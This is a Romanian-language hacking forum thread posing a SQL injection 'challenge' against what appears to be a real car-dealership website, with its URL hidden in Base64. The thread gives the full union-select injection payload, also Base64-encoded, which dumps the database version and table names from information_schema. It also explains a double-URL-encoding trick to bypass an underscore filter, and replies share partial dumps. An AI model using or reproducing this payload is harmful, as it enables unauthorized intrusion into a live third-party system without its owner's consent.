Jump to content
Renegade

[SQLi] challenge

Recommended Posts

Posted (edited)

Target

aHR0cDovL3d3dy5jaXRyb2VuLXNhaW50bG91aXMuY29tL2ZyL2Rpc3RyaWJ1dGV1ci1jaGF0ZW5ldC9jaGF0ZW5ldF82Nzg=

Base64

Tasks:

  • display version with your name
  • display table names from primary database
  • remove commas after table name (as in picture)

Proof:

sqlichall.png

Rules:

  • use union select based SQLi
  • post picture as proof
  • send me your command to PM

Solvers:

- Hannibal.

- Todo

- ajkaro

- danyweb09

Rezolvare:

aceasta este syntaxa mea

aHR0cDovL3d3dy5jaXRyb2VuLXNhaW50bG91aXMuY29tL2ZyL2Rpc3RyaWJ1dGV1ci1jaGF0ZW5ldC9jaGF0ZW5ldF82NzgnIGFuZCBmYWxzZSBVTklPTiBTRUxFQ1QgMSwyLDMsNCwweDUyNjU2ZTY1Njc2MTY0NjUsdmVyc2lvbigpLDcsOCxjb25jYXQocmVwbGFjZShncm91cCUyNTVmY29uY2F0KHRhYmxlJTI1NWZuYW1lLDB4M2M2MjcyM2UpLCcsJywnJykpLDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzIGZyb20gaW5mb3JtYXRpb24lMjU1ZnNjaGVtYS50YWJsZXMgd2hlcmUgdGFibGUlMjU1ZnNjaGVtYT1kYXRhYmFzZSgpLS0gLQ==

Base64

  • pentru injectie am folosit '
  • pentru comentara ei am folosit -- -
  • pentru bypass la _ am folosit %255f,adica:
    _ si il treceti in hex,astfel devine %5f iar apoi %5f in urlencode
  • pentru inlocuirea virgulei de dupa tabele eu am folosit "replace"

challenge closed

Edited by Renegade
Posted

Am ajuns pana la tabele...ma poate ajuta cineva cu ele? Am incercat diferite "chestii" dar nu am reusit. Vreau sa ma ajutati pentru incultura mea generala ;)) nu pentru CH.

Astept un PM va rog. Multumesc.

Posted

o sa postez diseara rezolvarea.pana atunci un hint.inlocuiti _ cu %255f.de unde %255f ???

luati _ si il treceti in hex,astfel devine %5f iar apoi %5f in urlencode

insa pe langa asta mai trebuie sa eliminati , la afisare tabelelor pentru a fi trecuti la solvers.succes

Posted

Asta am facut insa mai trb sa elimin " , " si

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...